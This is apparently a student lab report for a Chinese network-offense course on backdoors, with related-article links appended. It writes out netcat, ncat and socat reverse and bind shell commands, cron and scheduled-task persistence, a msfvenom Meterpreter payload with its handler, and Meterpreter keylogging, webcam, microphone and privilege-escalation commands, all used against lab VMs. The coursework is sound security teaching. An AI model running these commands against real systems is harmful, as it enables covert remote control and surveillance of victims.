2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
下载破解游戏,盗版电影或安装来历不明的软件,可能被留下后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win环境下可以开机自动启动,linux环境可以用corn启动。
(3)Meterpreter有哪些给你映像深刻的功能?
可以自己定制后门程序,针对不同用户不同主机不同人群。
(4)如何发现自己有系统有没有被安装后门?
杀毒软件报错,开启防火墙等防护措施。
任务一
使用ipconfig
查询win7的IP地址
进入ncat文件夹中,使用命令ncat.exe -l -p 5337
监听本机的5337端口
在kali环境中使用netcat
命令连接到Windows主机,使用netcat
命令netcat 192.168.1.101 5337 -e /bin/sh
进行连接
即可获取kali权限
任务二
使用ifconfig
查看kali的IP地址
使用nc -l -p 5337
指令监听5337端口
在Windows下,使用ncat.exe -e cmd.exe 192.168.1.154 5337
反向连接kali的5337端口
在kali下可以看到已经获得Windows权限Microsoft Windows,可以输入命令进行操作
任务三
首先在Windows下监听5337端口ncat.exe -l 5337
从kali使用netcat 192.168.1.101 5337
命令连接到Windows端口
建立连接后可以进行数据传输
任务四
在Windows系统下,使用ncat.exe -l -p 5337
监听5337端口
在kali中,使用crontab -e
指令编辑一条定时任务,输入指令后选3进入crontab编辑界面
在最后一行添加07 * * * * /bin/netcat 192.168.1.101 5337 -e /bin/sh
,在每个小时的第07分反向连接Windows主机的5337端口,然后保存退出
因为做的时候是20:05 于是我设定07启动
任务五
在win7右键我的电脑,点击管理,在任务计划程序中点击创建任务,填写任务名字并编辑触发器。
点击操作选择启动程序程序或脚本填写你自己的socat.exe程序的路径,在添加参数中填写tcp-listen:5337 exec:cmd.exe,pty,stderr
创建完成之后锁定计算机再重新启动发现程序已经在运行了
在kali虚拟机中输入socat - tcp:192.168.1.101:5337
可以发现已经成功获得了一个cmd shell
任务六
在kali上执行命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.154 LPORT=5337 -f exe > 20165337_backdoor.exe
这里的IP地址填写kali的IP地址,生成后门程序20165337_backdoor.exe
在Windows下进入ncat文件夹输入命令ncat.exe -lv 5337 > 20165337_backdoor.exe
,被控主机就进入了文件接收模式
在kali中输入nc 192.168.1.101 5337 < 20165337_backdoor.exe
,这里的IP为win7的IP,进行后门文件的传输
传输完成
在Kali上使用命令msfconsole
进入msf控制台
输入:
use exploit/multi/handler
使用监听模块,
set payload windows/meterpreter/reverse_tcp
设置payload
set LHOST 192.168.1.154
设置反弹回连的IP和端口,这里用的是kali的IP
set LPORT 5337
设置反弹回连的IP和端口
输入show options
exploit
使用监听
运行Win7的后门程序
kali已经获取权限
任务七
在任务六的基础上进行
使用record_mic
指令截获一段音频,用-d选项设置录制时间
使用webcam_snap
指令可以使用摄像头进行拍照
但是win7不能调用摄像头,会出现以下界面
使用keyscan_start
开始记录下敲键的过程,使用keyscan_dump
指令读取敲键的记录
使用screenshot
命令进行截屏
使用命令getuid
查看当前用户,使用getsystem
命令提权
2018-2019-2 20165337《网络对抗技术》Exp2 后门原理与实践的更多相关文章
- 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践
2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...
- 20155326刘美岑 《网络对抗》Exp2 后门原理与实践
20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155320《网络对抗》Exp2 后门原理与实践
20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 20155208徐子涵《网络对抗》Exp2 后门原理与实践
20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...
- 20145236《网络对抗》Exp2 后门原理与实践
20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...
- 20155202 张旭《网络对抗》Exp2 后门原理与实践
20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...
- 20155218《网络对抗》Exp2 后门原理与实践
20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...
- 20155227《网络对抗》Exp2 后门原理与实践
20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...
- 20155232《网络对抗》Exp2 后门原理与实践
20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...
随机推荐
- java网络编程基本知识
1.基本概念 网络:一组相互连接的计算机,多台计算机组成,使用物理线路进行连接 网络连接的功能:交换数据.共享资源 网络编程3要素: IP 地址:唯一标识网络上的每一台计算机,两台计算机之间通信的必备 ...
- iOS截屏并修改截图然后分享的功能实现
一. 实现的效果类似微博的截图分享 不仅截图分享的时候还进行图片的修改,增加自己的二维码 二.实现方式 苹果在ios7之后提供了一个新的通知类型:UIApplicationUserDidTakeScr ...
- 关于map的初级应用
map实际采用了红黑树的实现,在此,我们先不讨论map的底层实现结构原理,先来看看map究竟是怎么用,以及我是怎么看待map的. 先上代码: #include <map> #include ...
- java集合-HashMap源码解析
HashMap 键值对集合 实现原理: HashMap 是基于数组 + 链表实现的. 通过hash值计算 数组索引,将键值对存到该数组中. 如果多个元素hash值相同,通过链表关联,再头部插入新添加的 ...
- 清除 x-code 缓存
https://www.jianshu.com/p/5673d8333544 之前由于经费不足,购置的128的mac,现在发现一不注意盘就满了,悔之晚矣...a).清除 x-code CoreSimu ...
- 小程序 canvas画本 地图片
ctx.drawImage('../../../../page/home/resources/pic/che_logo.png', 10, 435, 50,50); 本地图片要根路径
- 【tool】VLC播放rtmp协议
您的输入无法被打开: VLC 无法打开 MRL「rtmp://112.35.3.71:47201/api/6276-0.1546939632724.flv」.详情请检查日志.
- 基于Redis实现分布式锁
分布式锁具有的特性: 1.排他性: 文件系统: 数据库:主键 唯一约束 for update 性能较差,容易出现单点故障 锁没有失效时间,容易死锁 缓存Redis:setnx 实现复杂: 存在死锁(或 ...
- [SDOI2017]苹果树
题目描述 https://www.luogu.org/problemnew/show/P3780 题解 一道思路巧妙的背包题. 对于那个奇怪的限制,我们对此稍加分析就可以发现它最后选择的区域是一个包含 ...
- (六)QDialog,QMessageBox,QFileDialog,QColorDialog颜色,QFontDialog字体
QDialog 对话框: 1.模态对话框: QDialog dlg(this); // 显示模态对话框 exec ,后面的不可操作 dlg.exec(); // 阻塞 2.非模态对话框: QDialo ...